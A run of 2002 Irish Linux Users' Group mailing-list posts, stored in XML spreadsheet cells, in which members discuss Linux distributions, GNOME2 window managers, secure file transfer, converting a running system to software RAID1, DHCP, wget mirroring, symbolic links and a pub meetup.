distributions.I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organisations.IMHO, as always...
- Matthew[1] Depending on your world view, this may be rephrased as "they need to
make oodles of profits and screw the little man to survive." This discussion
is beyond the scope of this list. :)[2]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</si>
  <si>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
&gt; hmm, I've never used gentoo
&gt; so I'll have to take your word
&gt; on that.  Perhaps something
&gt; similar to that Ximian RedHat
&gt; dealy would be cool.  Like
&gt; a gui installer for slackware![1]
&gt; 
&gt; ;]
&gt; 
&gt; shane
&gt; 
&gt; [1]I'm shure Patrick V. would love
&gt; that.(not)Or slackware with ports... not portage.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">bugger, lost the url to that
site/tarball in question. I have
it on a cd somewhere though.
the bblcd toolkit is similar
but is for building a cd-based
distro.[1]shane[1]*this time*
http://www.bablokb.de/bblcd/-----Original Message-----
From: kevin lyda [mailto:kevin+dated+1029661657.64143c@ie.suberic.net]
Sent: 13 August 2002 10:08
To: ilug@linux.ie
Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:
&gt; distro.  There's even a tarball[1] with thissegfault.  core dumped.--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</si>
  <si>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 
&gt; &gt; hmm, I've never used gentoo
&gt; &gt; so I'll have to take your word
&gt; &gt; on that.  Perhaps something
&gt; &gt; similar to that Ximian RedHat
&gt; &gt; dealy would be cool.  Like
&gt; &gt; a gui installer for slackware![1]
&gt; &gt;
&gt; &gt; ;]
&gt; &gt;
&gt; &gt; shane
&gt; &gt;
&gt; &gt; [1]I'm shure Patrick V. would love
&gt; &gt; that.(not)
&gt; 
&gt; Or slackware with ports... not portage.Where ports==FreeBSD like and portage==Gentoo style, perhaps some would
regard that as a retrograde step.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Shane Ryan asked:
&gt; ...but maybe there is general interest in
&gt; an Irish distro.I have my own thoughts on this, and would be very keen to create yet another
new (and different) distro.Of course, it would require a minimum of EUR300,000 in funding, which is the
reason I have not started this project myself...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</si>
  <si>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
Anyone notice that Esat have started routing most of
their traffic through Concert...  I've just had my
first &gt;32hop traceroute since the 1995(ish)So much for being at the heart of the Internet !--Chris Higgins
Horizon
e: chris.higgins at hts.horizon.ie
tel: +353-1-6204900
fax: +353-1-6204901-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 13.08.2002 at 08:42:44, "John P. Looney"  wrote:
&gt;  Vendors wrote their own wierd-ass installers &amp; config tools to lock
&gt; people to their OS, they added all sorts of functionality that was not
&gt; availible to other OSes to make themselves different from the competition
&gt; (Motif on non-free OSes, incompatible filesystems etc).Not sure Motif is a good example, really. When Mozilla was going through its
"Let's Use Motif/Let's Not" phase, Jamie Zawinski mentioned in passing that the
installed base of Motif-bearing systems kicked the installed base of
Linux-bearing systems into a huddled ball. Something, perhaps, to do with the
fact that every
Sun/Solaris box since version mumble shipped with it, plus every HP/UX box,
and
for all I know every other mainstream proprietary Linux. Motif was more a
unifier across Unix subspecies than a differentiator.Now, filenames longer than 14 characters, maybe, or the options for ps (are we
sysv or bsd?), or the whole /dev tree, or the libc implementation...Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Of course, it would require a minimum of EUR300,000 in funding, which is
&gt; the
&gt; reason I have not started this project myself... :(
&gt; 
&gt; - MatthewIt would?
Sounds like you are talking about setting up a company, to be a vendor....
I'd venture the early days of Debian, Slackware and other involveds there
was no such financing.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Two interesting analyses of the Irish implementation of copyright as led by, as
best I can tell, anticipation of the EUCD (since the Irish law was passed in
2000, and the EUCD is somewhat more recent than that). The pieces of interest
are the papers by Prof. Robert Clark, who perhaps might not be a bad choice of
speaker for some future LUG gathering. One of the more eye-opening comments in
the second of his papers is that Irish legislation is, in effect, more
draconian than the DMCA.http://www.cai.ie/Past%20Events.html#2002There are some other interesting pieces here, too, for anyone concerned about
copyright and the like in Ireland.Cheers,
Waider. Props to Danny at NTK (www.ntk.net) for the link.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I ususally disconnect the internal speaker - thats pretty sure to stop any
beeping!G.
___________________________
 Graham Smith,
 Network Administrator,
 Department of Computing,
 Institute of Technology,
 Tallaght, Dublin 24
 Phone: + 353 (01) 4042840-----Original Message-----
From: Ã‰ibhear [mailto:eibhear.geo@yahoo.com]
Sent: 12 August 2002 16:49
To: Ã‰ibhear; Padraig Brady; ilug@linux.ie
Subject: Re: [ILUG] I hate noise!
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Try that on a Sun :( you have to disect the keyboard -----Original Message-----
From: Smith, Graham - Computing Technician
[mailto:Graham.Smith@it-tallaght.ie]
Sent: Tuesday, August 13, 2002 12:07 PM
To: ilug@linux.ie
Subject: RE: [ILUG] I hate noise!
I ususally disconnect the internal speaker - thats pretty sure to stop any
beeping!G.
___________________________
 Graham Smith,-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
&gt;  I decided to try out GarGnome, to see what gnome2 looks like. It's
&gt; pretty, I'll give it that.
&gt; 
&gt;  However, there seemed to be loads of bugs - sawfish threw wobblers all
&gt; over the place, so I tryed out metacity - which doesn't have a GUI
&gt; configurator, and arsed if I'm going back to the fvwm days when you had to
&gt; set settings by hand, without an idea what the values looked like.Have you tried gconf-editor? It's a GUI front-end to gconf
settings (and metacity has it's settings handled by gconf, like
all good gnome2 apps). It's true there's no designated metacity
configurator - but the whole point of metacity is to have
reasonable defaults, and thus get away from the need for settings
altogether, and have the window manager be not in the way (as so
many are).As to the sawfish issue, no idea, sorry - are you sure that
gnome2's panel handles 1.4 applets at all?Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Linux: the film.
http://www.revolution-os.com/  (trailer + first 8 mins online)I wonder if this will ever get to Ireland? Otherwise, I wonder if it would
be possible to get the Trinity Internet Society or somewhere to show it?Justin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:59:06PM +0200, David Neary mentioned:
&gt; Have you tried gconf-editor? It's a GUI front-end to gconf
&gt; settings (and metacity has it's settings handled by gconf, like
&gt; all good gnome2 apps). Hmm. It's even worse than using a text editor on a file.&gt; It's true there's no designated metacity configurator - but the whole
&gt; point of metacity is to have reasonable defaults, and thus get away from
&gt; the need for settings altogether, and have the window manager be not in
&gt; the way (as so many are). Don't buy it. shift-alt-s should start a shell, alt-d should maximise a window
vertically, alt-q should close a window, alt-w should shade it. These I've
used for about eight years, and I'm not about to change them now. Stuff like alt-1 to go to workspace-1, I love - it just appeared in
windowmaker about six years back, and I've also gotten used to it.&gt; As to the sawfish issue, no idea, sorry - are you sure that
&gt; gnome2's panel handles 1.4 applets at all? Wierdly, I've gone back to sawfish &amp; gnome 1.4 - and the keybindings
still don't work. It's not fair.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">What are the best options available on Linux ? SFTP ? WebDAV ? Something
else ? Linux servers - Linux and Mac OS-X clients.Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
&gt; else ? Linux servers - Linux and Mac OS-X clients.
&gt; 
If you mean secure file transfer
scp is good-- Redbrick - Dublin City University Networking Society
Declan McMullen - Education Officer
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
&gt; else ? Linux servers - Linux and Mac OS-X clients.Can't speak for the other alternatives, but i've been using scp for
years with sexy results.Steve, yes, it's a simpsons quote(ish).
-- 
High salt diets are bad for you - but only outside marriage.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian O'Donoghue asked:
&gt; &gt; Of course, it would require a minimum of EUR300,000 in funding
&gt;
&gt; It would?Well,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Mandrake/YellowDog, RedHat/SuSe and Debian you have enough options to cover
most day-to-day requirements. And a lot of the specific situations are
already covered (smoothwall, familiar, etc.)Therefore, if I were to create a new Linux distribution, I would have to
spend time crafting it so that it offers a lot more than existing
alternatives. My requirements normally involve better support/easier
maintenance, and if one follows the logic through, this would require a
company to be behind such an initiative.I imagine it would be possible to create a new distribution in about one
week[1]. For example: take Debian as your base, slap a specific set of
packages on CD, change a few config files, mention that it has been untested
on most hardware variations, and voila, a "new" distie. :)- Matthew[1] That is, IT weeks. 1 IT week ~= two months. :)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</si>
  <si>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rsync over ssh.. very nice!Donncha.
On Tuesday 13 August 2002 12:22, Niall O Broin wrote:
&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
&gt; else ? Linux servers - Linux and Mac OS-X clients.
&gt;
&gt;
&gt;
&gt; Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
&gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
&gt; else ? Linux servers - Linux and Mac OS-X clients.http://www.fs.net/kevin--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</si>
  <si>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 xml:space="preserve">On Tue, Aug 13, 2002 at 04:10:57PM +0100, John P. Looney mentioned:
&gt; &gt; I think this procedure is described in the RAID HOWTO for installing a
&gt; &gt; new system, but it applies just as well to a running system.
&gt; 
&gt;  Just double checking (I'd be pissed if I just wiped my installation!)... Well, this mostly worked, despite Colm saying that "you want the
"failed-disk" *instead* of the second "raid-disk", not in addition to it". I suppose that means instead of:&gt; raiddev /dev/md0
&gt;         raid-level      1
&gt;         nr-raid-disks   2
&gt;         nr-spare-disks  0
&gt;         chunk-size     4
&gt;         persistent-superblock 1
&gt;         device          /dev/hdg3
&gt;         raid-disk       0
&gt;         device          /dev/hda5
&gt;         raid-disk       1
&gt; 
&gt;         failed-disk     1 I should have had:&gt; raiddev /dev/md0
&gt;         raid-level      1
&gt;         nr-raid-disks   2
&gt;         nr-spare-disks  0
&gt;         chunk-size     4
&gt;         persistent-superblock 1
&gt;         device          /dev/hdg3
&gt;         raid-disk       0
&gt;         device          /dev/hda5
&gt;         failed-disk     1 It likely means that I was just lucky I put the failed-disk directive
after the raid-disk one :) Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On boot, I see:Partition check:
 hda: [PTBL] [2482/255/63] hda1 hda2 hda3 hda4 &lt; hda5 &gt;
 hdg: [PTBL] [2434/255/63] hdg1 hdg2 hdg3
floppy0: no floppy controllers found
RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize
ide-floppy driver 0.99.newide
md: md driver 0.90.0 MAX_MD_DEVS=256, MD_SB_DISKS=27
md: Autodetecting RAID arrays.
 [events: 00000000]
md: invalid raid superblock magic on hda2
md: hda2 has invalid sb, not importing!
md: could not import hda2!
 [events: 00000004]
 [events: 00000002]
 [events: 00000004]
md: autorun ...
md: considering hdg3 ...
md:  adding hdg3 ...
md:  adding hda5 ...
md: created md0
md: bind
md: bind
md: running: 
md: hdg3's event counter: 00000004
md: hda5's event counter: 00000004
md: RAID level 1 does not need chunksize! Continuing anyway.
kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2
md: personality 3 is not loaded!
md :do_md_run() returned -22
md: md0 stopped.
md: unbind
md: export_rdev(hdg3)
md: unbind
md: export_rdev(hda5)
md: considering hdg1 ...
md:  adding hdg1 ...
md: created md1
md: bind
md: running: 
md: hdg1's event counter: 00000002
md: RAID level 1 does not need chunksize! Continuing anyway.
kmod: failed to exec /sbin/modprobe -s -k md-personality-3, errno = 2
md: personality 3 is not loaded!
md :do_md_run() returned -22
md: md1 stopped.
md: unbind
md: export_rdev(hdg1)
md: ... autorun DONE. Any ideas why ? My suspicion is that I've a lack of knowledge about how initrd works, so
I'm not sure it's loading it. For a start, the / filesystem is being
mounted as ext2, at first, not ext3. It does seem mounted as ext3 after
the fsck is done - but that means that it's mounted as ext2 read only,
fsck'ed and then remounted ext3. Losing the point of it. Given I can't pass the kernel parameters (I think), how then can I get it
to load the initrd ?Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I don't see why not John, but I'd sure backup my data first ;--)So I suppose you could setup half of the raid1, copy your partitions across,
vi lilo to append the new device labels, /dev/md0 instead of /dev/hda...
re-run lilo, then raidhotadd /dev/xxx /dev/md0 [or is that the other way
around?]I have never tried this so this could be bollix, I have setup root-raid
systems but during install time, I have had drive failures on my
"production" systems at home and successfully re-built the raid many times.
IMHO linux software raid is extremely good.When are we going to have a pint? CW--------------------------
 I've a running system, and I want to set it up so that the disks are
mirrored. I'll win a little more read speed, and a lot more reliability. However, the RAID_HOWTO just mentions RAID 1 and RAID 0 on a machine
that's new. They don't mention anything about an existing setup. Is it
possible to setup disk mirroring on a running box ?Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
&gt; When are we going to have a pint?  Tuesday next week. Boars Head, Capel st.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">All right, can't get pissed though as its a week-day. If we were to do it in
Lucan, that would be another story ;--)Do we have many takers? CW-------------
On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
&gt; When are we going to have a pint?  Tuesday next week. Boars Head, Capel st.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
Does anyone use partitioning on a Linux server? What is the recommended solution? UML? 
Cheers,
Sorin-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Mmmph. You may actually need -L/usr/lib/X11 (or -L/usr/X11R6/lib) to
&gt; make this work. I'm sure ld/gcc is smart enough to cope with out of
&gt; order args.ld does not generally cope with out of order args by design.Nick
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Quoting Paul O'Neil :
&gt; 
&gt; &gt; Excuse me for asking an old question here but Ive been running SuSE 
with a
&gt; &gt; cable modem for a couple months. About 5-6 weeks ago the internet 
access
&gt; &gt; was
&gt; &gt; not working and I rebooted noticing I came up with a new IP 
address, and it
&gt; &gt; worked fine. How does it work exactly when the cable company 
releases and
&gt; &gt; renews an ip address. Do they merely setup their system to issue 
new ip
&gt; &gt; addresses when cusomters reboot their computer or does it take 
affect
&gt; &gt; immediately and it caused the internet disruption that required a 
reboot or
&gt; &gt; at least a network reload? If so, can this be detected 
automatically and
&gt; &gt; taken care of or is that just how it works?
&gt; 
&gt; A DHCP client daemon (dhcpcd, pump) can do this automatically.  Some 
cable
&gt; companies apparently reassign the same address over and over when the 
leases run
&gt; out, so you get away without a daemon for long enough to make you 
think you
&gt; don't need one. :-)
&gt; 
&gt; Ronan
&gt; 
&gt; Is what your talking about, this process is running all the time. root       422  0.0  0.4  1332  500 ?        S    03:18   
0:00 /sbin/dhcpcd -D -N -Y -t 999999 -h cable-modem-1 eth0If alright then maybe coincidence, I'll wait and see when I get another 
address.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Takers galore possibly (me inclusive). Especially when the subject
is more on-topic :-)Gary.On Wed, Aug 14, 2002 at 10:08:03AM +0100, Wynne, Conor wrote:
&gt; All right, can't get pissed though as its a week-day. If we were to do
&gt; it in Lucan, that would be another story ;--)
&gt; 
&gt; Do we have many takers? 
&gt; 
&gt; CW
&gt; 
&gt; -------------
&gt; On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
&gt; &gt; When are we going to have a pint? 
&gt; 
&gt;  Tuesday next week. Boars Head, Capel st.
&gt; 
&gt; Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed 14 Aug 2002 08:42, John P. Looney wrote:&gt; It likely means that I was just lucky I put the failed-disk
&gt; directive after the raid-disk one :)Extremely lucky.  The other way around would have toasted your
existing volume.
&gt; Anyway. It's doesn't quite boot right, with /=/dev/md0 in fstab. On
&gt; boot, I see:In order to autodetect soft RAID volumes at boot, you need to set the
partition type on all the relevant raw disk partitions to 0xFD.  I'm
not sure about the initrd stuff; as I don't use it myself.           Colm-- 
Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
Office closed on Mondays.  If you want anything on Monday, come on Tuesday.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
    Can anyone offer me any advice on using an MRi dual port PCI - serial
card.  MRi claim it works, but that not at 9600 baud.  I AM using it at
9600, but I get a 10s delay on output, followed by just 16 bytes,
repeated untill complete.  Similarly, on input, I get a delay before the
app' sees the data.TIA
Shane-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 08:24:47PM +0100, Aidan Kehoe wrote:
&gt;  Ar an 20Ãº lÃ¡ de mÃ­ 7, scrÃ­obh kevin lyda :
&gt;  &gt; actaully i think soft links were invented because you can't hard link
&gt;  &gt; directories. 
&gt; But you could hard link directories, back when soft links were
&gt; being invented, AFAIK. that was before my time.  all unix systems i've used didn't allow hard
links to directories, or if they did they were restricted to root.
the reason why is because you could cause infinite loops in the kernel -
usually a bad place for infinite loops.&gt;  &gt; apparently some systems limited soft links to the same device but
&gt;  &gt; gave up after a while.  
&gt; Why?to make them consistent with hard links.&gt; A better way of doing it would be a) have global unique filesystem
&gt; identifiers for every FS created (such that the chance of two of them
&gt; clashing is miniscule; 64 bits creatively used would do it, I'd say),
&gt; and b) implement the target info for the soft link as a {FSID, inode}
&gt; pair; the OS can work out if the thing linked to is now on a different
&gt; mount point, or has been moved. (HFS fans, is that what's done? Or are
&gt; aliases implemented differently?)let's call these super-soft-links.  ln -ss    % ln -ss foo bar
    % ls -i foo
    111 foo
    % mv floyd foo
    % ls -i foo
    222 fooand now bar no longer points to foo.    % ln -ss foo bar
    % ls -i foo
    111 foo
    % rm foo
    % touch floyd
    % ls -i floyd
    111 floydthe fs would need to maintain a table of links going the other direction.
so when the move command unlinks foo in the first example, it could
check the table and mark that bar is now disconnected.  the same would
be true for the second example - and even more important since bar points
to floyd if no table is consulted.and this all fails to handle nfs mounted file systems or filesystems
that have dynamic inodes (the fat fs's and reiser lacks inodes i think).kevin--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
</t>
  </si>
  <si>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;-)The PentiumPro improved the pipeline enormously. Again, a properly written 
compiler should be able to optimise for this, once it can organise the code 
properly.The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instructions!Not sure what improvements the P4 introduce? I think it's mostly just speed 
improvements rather than any execution changes.So, The difference between the 386 and the PentiumMMX 'should' yield a 
significant speed boost if optimised correctly. There are faster floating 
point instructions and pipelining that need optimising for. I'm not sure if 
GCC can optimise properly for the pipelining, at least the PGCC group found 
significant improvements to add to GCC2.95.3 to gain speed improvements of 
upto 30%. 30% of 48 hours is 14.4 hours. Of course none of this will have any 
effect on O/I bound processes but GUI's are mostly CPU bound. I am also 
finding out about object pre-linking optimisations which should give even 
better performance for QT and KDE.Now if I had another PIII for my box, I could take advantage of those SSE 
instructions to optimise XFree86 as well!&gt; kevinAn, of course, I've loads of time on my hands now and I need something to 
keep me busy. At least I can say that I've sucessfully built a full Linux 
system, including KDE3 from scratch when I'm done ;-)
Cheers,	John Gay-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Partitioning is an ambiguous term
but I think I know what you mean.
Have you looked at: http://freevsd.org/PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi guys,
   slightly OT. This comes from The Register from last
month, but I only came across it;http://www.theregister.co.uk/content/4/26207.html   Some/all of you may know that the government in
Peru were going to instruct state bodies to look at
using open source software in an attempt to save money
over M$ licences. Well, read the above article.   Eamonn__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi,
This is driving me nuts. I'm trying to run a once off mirror of a
website using wget. It's ignoring images and not recursing links (even
though I've specified the --mirror flag).wget --mirror https://username:password@foobar.com/a/b/a/index.htmlAny ideas or alternative tools?ct-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>I've been asked to forward this on ... Anyone interested, give me a shout and I'll put you in touch with Ryan ...P&gt; -----Original Message-----
&gt; Proinnsias, 
&gt; 
&gt; I'd be obliged if you could pass this along to all your Linux buddies....
&gt; 
&gt; For Sale:
&gt; 	Power Computing PowerCurve
&gt; (http://www.powerwatch.com/systems/pcurve.html)
&gt; 	Original 120Mhz PPC-601 daughter card
&gt; 	Slim Desktop case
&gt; 	128MB RAM (new)
&gt; 	2GB Apple (IBM) SCSI-2 HDD (new)
&gt; 	Ati Rage Video card (new)
&gt; 	4 x Speed Toshiba CdRom (used, not apple but driver hacked -
&gt; available from web)
&gt; 	keyboard &amp; mouse (new)
&gt; 
&gt; 	Currently running MacOS9.1 (small partition) and Debian "Woody".  OK
&gt; as is (think 
&gt; 	Pentium 233ish) or ready for upgrade to G3-500 for some real
&gt; performance!
&gt; 
&gt; 	Asking price EUR200, open to negotiation.
&gt; 
&gt; Regards, 
&gt; Ryan
&gt; 
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>You could try HTTrack, available here: http://www.httrack.com/index.phpIt does recursive grabs of stuff, gets pictures etc.Hello everyone, by the way.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Apologies all.  I have comitted a cardinal sin by not specifying that this
was for a windows machine.
----- Original Message -----
From: "Kenn Humborg" 
To: "David Crozier" 
Cc: 
Sent: Friday, August 16, 2002 1:51 PM
Subject: RE: [ILUG] Autorun CDs
&gt; &gt; Cheers All for your words of wisdom.
&gt; &gt;
&gt; &gt; I came across this which has worked a treat:-
&gt; &gt;
&gt; &gt; http://www.avdf.com/mar97/art_autorun.html
&gt;
&gt; (This is all Windows-related autorun stuff).
&gt;
&gt; So why did you waste the time of those who looked
&gt; up Linux-related info for you?  If you said that it
&gt; was for Windows, you'd probably have gotten both
&gt; more relevant answers and flames for asking this on
&gt; a _Linux_ mailing list.
&gt;
&gt; Sheesh...
&gt;
&gt; Later,
&gt; Kenn
&gt;-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Kenn Humborg wrote:
&gt;&gt;Cheers All for your words of wisdom.
&gt;&gt;
&gt;&gt;I came across this which has worked a treat:-
&gt;&gt;
&gt;&gt;http://www.avdf.com/mar97/art_autorun.html
&gt; 
&gt; 
&gt; (This is all Windows-related autorun stuff).Which was obvious since he mentioned:
`start file.html`
And the reason I didn't reply, Doh!PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi,I'm going to be using MySQL in an upcoming project (and probably
buying their support license), and I'm wondering if anyone else
has used any libraries to link a proprietary C++ project to a
MySQL database. From what I can see on the MySQL website, their
MySQL++ library is under the GPL, but there's also some documents
which list it as under the LGPL.Anyone got any experience with this, or has used a different
library to link C++ and MySQL under Linux?Regards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>wintermute wrote:
&gt;&gt;Anyone know where in Ireland I can get a replacement external dongle
&gt;&gt;for a Xircom CE3B-100 PCMCIA NIC?
&gt;&gt;
&gt;&gt;Failing that, who delivers fastest to Ireland?
&gt;&gt;
&gt;&gt;Regards,
&gt;&gt;
&gt;&gt;Vin
&gt; 
&gt; I went into Maplin looking for exactly this sort of thing, only to be told I
&gt; would have to by a whole new card.....
&gt; Buy &amp; Sell I'd say else just by a new NIC...(which I didn't do) I just live
&gt; with the fact I have to angle the CAT 5 at a certain angle to my NIC or the
&gt; dongle will fall out!Well, I went hunting online and it is definitely possible to get
replacement dongles, specifically for this card but also for
others.Tricky though ;-)Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; Anyone know where in Ireland I can get a replacement external dongle
&gt; for a Xircom CE3B-100 PCMCIA NIC?
&gt;
&gt; Failing that, who delivers fastest to Ireland?
&gt;
&gt; Regards,
&gt;
&gt; Vin
I went into Maplin looking for exactly this sort of thing, only to be told I
would have to by a whole new card.....
Buy &amp; Sell I'd say else just by a new NIC...(which I didn't do) I just live
with the fact I have to angle the CAT 5 at a certain angle to my NIC or the
dongle will fall out!
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Fri, Aug 16, 2002 at 01:59:55PM +0100, Padraig Brady wrote:
&gt; Kenn Humborg wrote:
&gt; &gt;&gt;Cheers All for your words of wisdom.
&gt; &gt;&gt;
&gt; &gt;&gt;I came across this which has worked a treat:-
&gt; &gt;&gt;
&gt; &gt;&gt;http://www.avdf.com/mar97/art_autorun.html
&gt; &gt;
&gt; &gt;
&gt; &gt;(This is all Windows-related autorun stuff).
&gt; 
&gt; Which was obvious since he mentioned:
&gt; `start file.html`
&gt; And the reason I didn't reply, Doh!
&gt; 
I actually assumed that the windows implementation was the only
one he'd seen, and he wanted the same for linux.where's that Rick Moen thing about how to ask a question?L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
